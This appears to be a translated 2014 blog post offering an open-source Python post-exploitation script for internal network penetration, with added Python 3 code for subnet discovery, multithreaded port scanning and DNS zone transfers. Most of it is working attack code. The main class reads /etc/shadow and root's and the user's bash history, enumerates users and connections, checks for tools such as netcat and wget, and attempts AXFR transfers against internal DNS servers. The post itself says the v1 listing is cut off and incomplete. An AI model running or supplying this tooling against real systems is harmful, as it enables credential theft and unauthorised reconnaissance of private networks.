

Python internal network penetration testing information-gathering script v1.0 (open source)

Date: 2014-08-28 14:43   Source: TuZhiJiaMi enterprise information security experts

  Once a penetration test has found an entry point into the internal network from the Internet, what remains is internal network penetration testing.

  Some people say that once you are on the internal network it is easy: just run hscan and you will scoop up a pile of weak passwords. I agree with that view, but in my opinion the internal network environment is far more complex. To pinpoint the targets you actually want there is much more to process, and only once you have the necessary information do you have targets to go after. I believe the hardest and most important part of a penetration test in a typical internal network is precise information gathering; the rest, routine vulnerability scanning and exploitation, follows naturally. If you had a detailed asset list, a network diagram and the matching password list there would be no need to penetrate anything, you would simply take the various privileges directly. The odds of that are small, but it is possible. Time permitting, you can also do mail monitoring, social engineering analysis and so on, but that is another matter.


  While doing internal network penetration I noticed that I start out by typing the same commands over and over: check the IP to see whether the pivot host is on the internal network; ping 8.8.8.8 to see whether it can reach the outside; netstat to see which internal IP addresses it is connected to; check the hosts file for host bindings; arp -a for the ARP table; traceroute for route reachability; nslookup for DNS resolution; find for database configuration files and sensitive files; and so on. None of this is hard or technically demanding, but every test burns a lot of time on it and the notes end up a mess. So I decided to write a script that runs it all automatically and produces one consolidated output document, to work more efficiently. Stay tuned.

  The first version is rather rough, but it basically works and will be improved step by step.

  v1 features:

  1. Host information collection + DNS zone transfer exploitation + root password sniffing (you have to call that code yourself)

  2. Internal network segment collection + live host detection (multithreaded) + common port scan (multithreaded)

  Bugs: some syntax errors on Linux; live host detection on Linux is unreliable
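  As an added example that is not the author's code: the network segment collection and the multithreaded liveness and port checks of feature 2, done in Python 3. It pulls addresses out of constructed sample output of the commands the script runs (netstat, arp, route, resolv.conf), keeps only RFC 1918 addresses through the ipaddress module instead of a first-octet string test (which would also accept 172.32.x.x or 192.0.2.x as internal), groups them into /24 candidates, and then runs a TCP connect() scan that counts an RST reply as proof the host is up even where ICMP ping is filtered. The scan target is a throw-away listener on 127.0.0.1 so it runs offline; the probe port list, thread counts and timeouts are assumed values.

```python
import errno
import ipaddress
import re
import socket
from concurrent.futures import ThreadPoolExecutor

# A dotted quad not glued to other digits or dots: "10.20.30.40:22" matches, "1.2.3.4.5" does not.
IP_RE = re.compile(r'(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])')
# Values that appear in netstat/route/resolv.conf output but never name an internal host.
NOISE = {'0.0.0.0', '255.255.255.255', '8.8.8.8', '114.114.114.114'}
RFC1918 = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]

def candidate_networks(texts, prefix=24):
    """Group every RFC 1918 address found in the command outputs by its /prefix network.

    Returns {'10.20.30.0/24': ['10.20.30.1', ...], ...}. Netmasks, public and loopback
    addresses fail the RFC 1918 membership test, so no first-octet compare is needed
    (that compare would wrongly accept 172.32.x.x or 192.0.2.x).
    """
    found = {}
    for text in texts:
        for raw in IP_RE.findall(text):
            if raw in NOISE:
                continue
            try:
                ip = ipaddress.IPv4Address(raw)
            except ipaddress.AddressValueError:      # e.g. 999.1.1.1 from a version string
                continue
            if not any(ip in net for net in RFC1918):
                continue
            net = ipaddress.ip_network('%s/%d' % (ip, prefix), strict=False)
            found.setdefault(net, set()).add(ip)
    return {str(net): [str(ip) for ip in sorted(ips)] for net, ips in found.items()}

# Constructed sample output (not a real capture) of the commands the script runs.
SAMPLE_OUTPUT = {
    'netstat -antlp': (
        "Proto Recv-Q Send-Q Local Address      Foreign Address      State\n"
        "tcp        0      0 0.0.0.0:22         0.0.0.0:*            LISTEN\n"
        "tcp        0      0 10.20.30.40:22     10.20.30.15:51122    ESTABLISHED\n"
        "tcp        0      0 10.20.30.40:3306   10.20.31.7:40212     ESTABLISHED\n"
        "tcp        0      0 10.20.30.40:41000  203.0.113.9:443      ESTABLISHED\n"),
    'arp -a': (
        "? (10.20.30.1) at 00:11:22:33:44:55 [ether] on eth0\n"
        "? (10.20.30.15) at 00:11:22:33:44:66 [ether] on eth0\n"),
    'route -n': (
        "Destination     Gateway         Genmask         Flags Iface\n"
        "0.0.0.0         10.20.30.1      0.0.0.0         UG    eth0\n"
        "10.20.30.0      0.0.0.0         255.255.255.0   U     eth0\n"
        "172.32.5.0      10.20.30.1      255.255.255.0   UG    eth0\n"),
    'cat /etc/resolv.conf': "nameserver 10.1.1.53\nnameserver 8.8.8.8\n",
}

def _connect_errno(host, port, timeout):
    """0 = port open; ECONNREFUSED = host answered with RST; anything else = filtered/unreachable."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            return s.connect_ex((host, port))
        except OSError as exc:                       # socket.timeout is an OSError with errno None
            return exc.errno or errno.ETIMEDOUT

def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """Multithreaded TCP connect() scan; returns the open ports in ascending order."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        codes = list(pool.map(lambda p: _connect_errno(host, p, timeout), ports))
    return sorted(p for p, code in zip(ports, codes) if code == 0)

def is_alive(host, probe_ports=(22, 80, 135, 443, 445, 3389), timeout=0.5):
    """Up if any probe port accepts or actively refuses (RST): works where ICMP ping is filtered."""
    with ThreadPoolExecutor(max_workers=len(probe_ports)) as pool:
        codes = list(pool.map(lambda p: _connect_errno(host, p, timeout), probe_ports))
    return any(code in (0, errno.ECONNREFUSED) for code in codes)

def local_demo():
    """Scan a throw-away listener on 127.0.0.1 (constructed target, works offline)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(('127.0.0.1', 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(('127.0.0.1', 0))
    closed_port = spare.getsockname()[1]
    spare.close()                                    # port is free again, so connects get RST
    try:
        open_ports = tcp_connect_scan('127.0.0.1', [open_port, closed_port])
        alive = is_alive('127.0.0.1', probe_ports=(closed_port,))
    finally:
        listener.close()
    return open_port, closed_port, open_ports, alive

if __name__ == '__main__':
    for net, ips in sorted(candidate_networks(SAMPLE_OUTPUT.values()).items()):
        print(net, ips)
    print(local_demo())
```

  Against a real segment you would feed candidate_networks the real command output, then call is_alive and tcp_connect_scan for each address in the candidate /24s. Keep the timeout short and the worker count modest, and expect connect() scans to show up in the targets' logs.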

  v2 plan:

  1. Fix the v1 bugs and the encoding problems

  2. Add sensitive file and configuration file search

  3. Weak password scanning

  v3 plan:

  1. Fix v2 bugs

  2. Add ARP sniffing

  3. Report output + a nicer interactive interface

  v4 plan:

  1. Fix v3 bugs

  2. Improve code efficiency

  Below is the v1 source, one very long class. The output messages were originally Chinese, but they came out garbled on some Linux systems, so I switched them to English. Note that this is Python 2 code (print statements, the Queue module), and the listing as published stops partway through the __decode method; GetDomainList, which NetworkInfoGet calls, is not on the page either:

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Python 2 (print statements, Queue module): run with python2.
import os
import getpass
import time
import socket
import re
# for portscan
from threading import Thread
from Queue import Queue
import platform
import types
from subprocess import Popen, PIPE
# for dns
import struct
import sys


class InScaner:
    def __init__(self, domain):
        self.NUM = 200
        self._re_IP = r'\d+\.\d+\.\d+\.\d+'
        self._re_startwithIP = r'^\d+\.\d+\.\d+\.\d+.*'
        self._re_network = r'^\d+\.\d+\.\d+'
        self.re_ip = re.compile(self._re_IP)
        self.re_startwithIP = re.compile(self._re_startwithIP)
        self.re_network = re.compile(self._re_network)
        self.host_ip = socket.gethostbyname(socket.gethostname())
        self.domain = domain
        self.path = os.getcwd()
        self.host_hostname = ''   # os.popen('hostname').read()
        self.host_id = ''         # os.popen('id').read()
        self.host_userlist = []
        self.host_useronline = ''
        self.host_last = ''
        self.host_systemId = ''   # os.popen('uname -a').read()
        self.host_systemversion = ''
        self.host_shadow = ''
        self.host_issue = ''
        self.host_bash_history = []
        self.host_services = ''   # not fingerprinted yet
        self.host_ESTABLISHEDlink = ''
        self.host_hackCmd = []
        self.host_complie = []
        self.dns = []
        # self.dns = ['58.83.193.214']
        self.etc_hosts = []
        self.ifconfig = ''
        self.arp = ''
        self.route = ''
        self.inerwww = ''
        self.internetout = ''
        self.keyip = []
        self.keyipmaybe = []
        self.networkmaybe = []
        self.network = []         # 192.168.1.0 format
        self.q = Queue()
        self.s = Queue()
        self.networkIPlistA = []
        self.portlist = [21, 22, 23, 25, 80, 81, 443, 1433, 1521, 3306, 3398,
                         5800, 5900, 5901, 5902, 6379, 7001, 7002, 7070, 8080,
                         8081, 8181, 8888, 9090, 9200, 27017, 28018]
        self.networkIP_portOpen = {}
        self.networkIP_weakPass = {}
        self._len_query = 0       # length of the DNS question section (set by __gen_query)

    def HostInfoGet(self):
        print '###################Get localhost information####################'
        print '#####localhost IP####'
        print self.host_ip + '\n'
        _hostcmdList = [
            'hostname',   # hostname
            'id',         # user id
            ''' cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4}' ''',
            'w',
            'last',
            'uname -a',
            'cat /etc/issue',
        ]
        print '#####Get hostname#####'
        self.host_hostname = os.popen(_hostcmdList[0]).read()
        print self.host_hostname
        print '#####Get current user#####'
        self.host_id = os.popen(_hostcmdList[1]).read()
        print self.host_id
        print '#####Get users information#####'
        userlist = os.popen(_hostcmdList[2]).read()
        self.host_userlist = userlist.split('\n')
        print userlist
        print '#####Get online users list#####'
        self.host_useronline = os.popen(_hostcmdList[3]).read()
        print self.host_useronline
        print '#####Get users login history#####'
        self.host_last = os.popen(_hostcmdList[4]).read()
        print self.host_last
        print '#####Get linux kernel version#####'
        self.host_systemId = os.popen(_hostcmdList[5]).read()
        print self.host_systemId
        print '#####Get linux release version#####'
        self.host_systemversion = os.popen(_hostcmdList[6]).read()
        print self.host_systemversion
        print '#####Get important local files#####'
        _hostfileList = [
            'cat /etc/shadow',
            'cat ~/.bash_history',
            'cat /root/.bash_history'
        ]
        print '#####Get shadow#####'
        self.host_shadow = os.popen(_hostfileList[0]).read()
        print self.host_shadow
        print '#####Get bash_history#####'
        self.host_bash_history.append(os.popen(_hostfileList[1]).read())
        self.host_bash_history.append(os.popen(_hostfileList[2]).read())
        print '###Get too much###'
        _servicecmdlist = [
            'netstat -antlp',
            ''' netstat -antlp | grep 'ESTABLISHED' '''
        ]
        print '#####Get system services and listening Port#####'
        self.host_services = os.popen(_servicecmdlist[0]).read()
        print self.host_services
        print '#####Get network ESTABLISHED#####'
        self.host_ESTABLISHEDlink = os.popen(_servicecmdlist[1]).read()
        print self.host_ESTABLISHEDlink
        print '#####Get cmd can be used#####'
        _host_hackSoft = [
            'nmap', 'nc', 'netcat', 'wget', 'tcpdump', 'wireshark', 'rpm',
            'yum', 'apt-get', 'ftp', 'ssh', 'telnet', 'scp', 'nslookup'
        ]
        for cmd in _host_hackSoft:
            # `type` is a shell builtin; exit status 0 means the command resolves
            typecmd = 'type ' + cmd + ' >/dev/null 2>&1'
            try:
                out = os.system(typecmd)
                if 0 == out:
                    self.host_hackCmd.append(cmd)
                    print '%s is ok' % cmd
                else:
                    print '%s is unused' % cmd
            except:
                print '%s is unused' % cmd
        print '###################Get localhost information finished####################\n'

    def mgFileGet(self):
        # Placeholder for the v2 credential/config file search
        print '##########Collecting password and credential files......##########'
        print 'PHP'
        print 'tomcat'
        print 'apache'
        print 'struts'
        print 'jboss'
        print 'weblogic'
        print 'ftp'
        print 'ssh'
        print 'vnc'
        print 'mysql'
        print 'oracle'
        print 'search'
        pass

    def NetworkInfoGet(self):
        print '####################Get network information####################'
        _netfileListCat = [
            'cat /etc/hosts',
            'cat /etc/resolv.conf',
        ]
        print '######Get DNS server IP#####'
        self.dns = self.re_ip.findall(os.popen(_netfileListCat[1]).read())
        for dns in self.dns:
            print dns
        print '#####Get /etc/hosts list#####'
        hosts = os.popen(_netfileListCat[0]).read().split('\n')
        for host in hosts:
            # print host
            _host = self.re_startwithIP.findall(host)
            if _host != []:
                self.etc_hosts += _host
        for host in self.etc_hosts:
            print host
        _netcmdList = [
            'ifconfig -a',
            'arp -a',
            'route -n',
            'ping %s -c 2' % self.domain,
            'ping 114.114.114.114 -c 2'
        ]
        print '#####Get localhost ip and interface information#####'
        self.ifconfig = os.popen(_netcmdList[0]).read()
        print self.ifconfig
        print '#####Get arp list#####'
        self.arp = os.popen(_netcmdList[1]).read()
        print self.arp
        print '#####Get route information#####'
        self.route = os.popen(_netcmdList[2]).read()
        print self.route
        print '#####Get innerDNSresolve test#####'
        self.inerwww = os.popen(_netcmdList[3]).read()
        print self.inerwww
        print '#####Can search the Internet or not#####'
        self.internetout = os.popen(_netcmdList[4]).read()
        print self.internetout
        print '#####DNS test#####'
        if self.dns == []:
            print 'sorry,we have no the dns ip'
        else:
            for dnsip in self.dns:
                print '###dns %s results###' % dnsip
                try:
                    # DNS zone transfer (GetDomainList is not part of the published listing)
                    self.GetDomainList(dnsip, self.domain)
                except:
                    print '##dns test failed##'
        print '#####Network exist#####'
        # Collect every IP in the results, drop the excluded ones, map each IP to a
        # network, dedupe, then save.
        ip = []
        keyip = []
        keyipmaybe = []
        network = []
        keynetwork = []
        keynetworkmaybe = []
        _ex_ip = [
            '127.0.0.1', '0.0.0.0', '255.255.255.255', '255.255.255.0',
            '255.255.0.0', '255.0.0.0', '127.0.1.1', '8.8.8.8', '114.114.114.114'
        ]
        _iplistsearch = [
            self.host_useronline, self.host_last, self.host_services,
            self.host_ESTABLISHEDlink, self.dns, self.etc_hosts, self.ifconfig,
            self.arp, self.route, self.inerwww
        ]
        _iplistsearchmaybe = [
            self.host_bash_history
        ]
        for text in _iplistsearchmaybe:
            if type(text) == type('1'):
                ip += self.__getIPinStr(text)
            elif type(text) == type(['1']):
                for text2 in text:
                    ip += self.__getIPinStr(text2)
        # dedupe and drop excluded IPs
        for ipnew in ip:
            if ipnew not in (keyipmaybe + _ex_ip):
                keyipmaybe.append(ipnew)
        self.keyipmaybe = keyipmaybe
        ip = []
        for text in _iplistsearch:
            if type(text) == type('1'):
                ip += self.__getIPinStr(text)
            elif type(text) == type(['1']):
                for text2 in text:
                    ip += self.__getIPinStr(text2)
        for ipnew in ip:
            if ipnew not in (keyip + _ex_ip):
                keyip.append(ipnew)
        self.keyip = keyip
        # convert IPs to networks and dedupe
        _ex_network = [
            '127.0.0.0'
        ]
        for netip in self.keyipmaybe:
            network.append(self.__ip2network(netip))
        for net in network:
            if net not in keynetworkmaybe + _ex_network:
                keynetworkmaybe.append(net)
        network = []
        for netip in self.keyip:
            network.append(self.__ip2network(netip))
        for net in network:
            if net not in keynetwork + _ex_network:
                keynetwork.append(net)
        # keep private address ranges only (first-octet test; see the added example above
        # for an RFC 1918 check that does not accept 172.32.x.x or 192.0.2.x)
        _privatNet = [
            '172', '192', '10'
        ]
        print "network may exist:"
        for net in keynetworkmaybe:
            netsplit = net.split('.')
            if netsplit[0] in _privatNet:
                print net
                self.networkmaybe.append(net)
        print "network exists ensure:"
        for net in keynetwork:
            netsplit = net.split('.')
            if netsplit[0] in _privatNet:
                print net
                self.network.append(net)

    def __ip2network(self, ip):
        return self.re_network.findall(ip)[0] + '.0'

    def __getIPinStr(self, string):
        ip = self.re_ip.findall(string)
        return ip

    def __gen_query(self, domain):
        import random
        TRANS_ID = random.randint(1, 65535)   # random ID
        FLAGS = 0
        QDCOUNT = 1
        ANCOUNT = 0
        NSCOUNT = 0
        ARCOUNT = 0
        data = struct.pack('!HHHHHH', TRANS_ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT)
        query = ''
        for label in domain.strip().split('.'):
            query += struct.pack('!B', len(label)) + label.lower()
        query += '\x00'   # end of domain name
        data += query
        self._len_query = len(query)   # length of query section
        q_type = 252   # Type AXFR = 252
        q_class = 1    # CLASS IN
        data += struct.pack('!HH', q_type, q_class)
        data = struct.pack('!H', len(data)) + data   # first 2 bytes should be length
        return data

    __OFFSET = 0   # Response Data offset
    __TYPES = {1: 'A', 2: 'NS', 5: 'CNAME', 6: 'SOA', 12: 'PTR', 15: 'MX',
               16: 'TXT', 28: 'AAAA', 38: 'A6', 99: 'SPF'}

    def __decode(self, response):
        RCODE = struct.unpack('!H', response[2:4])[0] & 0b00001111
        if RCODE != 0:
            print 'Transfer Failed.'
        # The published listing ends here; the rest of __decode is not on the page.


if __name__ == '__main__':
    # Minimal driver, not part of the original listing: python inscaner.py <internal-domain>
    scanner = InScaner(sys.argv[1] if len(sys.argv) > 1 else 'localhost')
    scanner.HostInfoGet()
    scanner.NetworkInfoGet()
```
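  The zone transfer part of the listing (__gen_query, and the __decode method that is cut off above), as an added Python 3 example that is not the author's code. It builds the length-prefixed AXFR question the same way the original does, then parses the server's reply: header flags and RCODE, the echoed question, and the answer records including RFC 1035 name compression, which every real AXFR response uses. The two sample replies (a zone with SOA, A and NS records for the made-up name corp.example, and a REFUSED reply) are constructed here, not captured; axfr() performs the live TCP exchange and needs network access.

```python
import random
import socket
import struct

AXFR = 252   # QTYPE of a full zone transfer
TYPES = {1: 'A', 2: 'NS', 5: 'CNAME', 6: 'SOA', 12: 'PTR', 15: 'MX', 16: 'TXT', 28: 'AAAA'}
RCODES = {0: 'NOERROR', 1: 'FORMERR', 2: 'SERVFAIL', 3: 'NXDOMAIN', 4: 'NOTIMP', 5: 'REFUSED', 9: 'NOTAUTH'}

def encode_name(domain):
    """Wire-format a name: length-prefixed labels ended by a zero byte."""
    out = b''
    for label in domain.strip('.').split('.'):
        out += struct.pack('!B', len(label)) + label.lower().encode('ascii')
    return out + b'\x00'

def build_axfr_query(domain, trans_id=None):
    """AXFR question (QTYPE 252, class IN) with the 2-byte length prefix DNS over TCP requires."""
    if trans_id is None:
        trans_id = random.randint(1, 65535)
    header = struct.pack('!HHHHHH', trans_id, 0, 1, 0, 0, 0)   # id, flags, QD, AN, NS, AR counts
    message = header + encode_name(domain) + struct.pack('!HH', AXFR, 1)
    return struct.pack('!H', len(message)) + message

def decode_name(msg, offset):
    """Read a possibly compressed name (RFC 1035 4.1.4); return (name, offset just past it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                    # 2-byte pointer into an earlier name
            end = offset + 2 if end is None else end
            offset = struct.unpack('!H', msg[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 64:
                raise ValueError('compression pointer loop')
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode('ascii'))
        offset += length
    return '.'.join(labels), end if end is not None else offset

def parse_axfr_response(msg):
    """Parse one DNS message (length prefix already stripped) into (rcode, [(name, type, ttl, value)])."""
    _, flags, qd, an, _, _ = struct.unpack('!HHHHHH', msg[:12])
    rcode = RCODES.get(flags & 0x000F, str(flags & 0x000F))
    offset = 12
    for _ in range(qd):                              # skip the echoed question
        offset = decode_name(msg, offset)[1] + 4
    records = []
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack('!HHIH', msg[offset:offset + 10])
        offset += 10
        if rtype == 1 and rdlen == 4:
            value = socket.inet_ntoa(msg[offset:offset + 4])
        elif rtype in (2, 5, 6, 12):                 # NS/CNAME/PTR target, or the SOA MNAME
            value = decode_name(msg, offset)[0]
        else:
            value = msg[offset:offset + rdlen].hex()
        records.append((name, TYPES.get(rtype, str(rtype)), ttl, value))
        offset += rdlen
    return rcode, records

def _recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('server closed the connection mid-transfer')
        buf += chunk
    return buf

def axfr(server, domain, timeout=5):
    """Live transfer over TCP/53 (needs network): read messages until the zone's closing SOA."""
    records, soa_seen = [], 0
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(build_axfr_query(domain))
        while soa_seen < 2:
            (length,) = struct.unpack('!H', _recv_exact(sock, 2))
            rcode, recs = parse_axfr_response(_recv_exact(sock, length))
            if rcode != 'NOERROR':
                return rcode, records
            records.extend(recs)
            soa_seen += sum(1 for r in recs if r[1] == 'SOA')
    return 'NOERROR', records

def build_sample_response(domain='corp.example', trans_id=0x1234):
    """Constructed reply (not a capture): SOA, A and NS records using name compression."""
    question = encode_name(domain) + struct.pack('!HH', AXFR, 1)
    ptr = b'\xc0\x0c'                                # pointer to the question name at offset 12
    soa_rdata = (encode_name('ns1.' + domain) + encode_name('hostmaster.' + domain)
                 + struct.pack('!IIIII', 2014082801, 3600, 900, 604800, 86400))
    soa = ptr + struct.pack('!HHIH', 6, 1, 3600, len(soa_rdata)) + soa_rdata
    a = b'\x08intranet' + ptr + struct.pack('!HHIH', 1, 1, 3600, 4) + socket.inet_aton('10.0.0.5')
    ns_rdata = b'\x03ns1' + ptr
    ns = ptr + struct.pack('!HHIH', 2, 1, 3600, len(ns_rdata)) + ns_rdata
    header = struct.pack('!HHHHHH', trans_id, 0x8400, 1, 3, 0, 0)   # QR|AA set, RCODE 0
    return header + question + soa + a + ns

def build_refused_response(domain='corp.example', trans_id=0x1234):
    """Constructed reply from a server that forbids transfers: RCODE 5 (REFUSED), no answers."""
    header = struct.pack('!HHHHHH', trans_id, 0x8005, 1, 0, 0, 0)
    return header + encode_name(domain) + struct.pack('!HH', AXFR, 1)
```

  A transfer from a server that permits it starts and ends with the zone's SOA, which is why axfr() stops after the second SOA. REFUSED or NOTAUTH means the server checked the client address and the technique is not available from this host, so try every nameserver listed in resolv.conf, as the script does.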
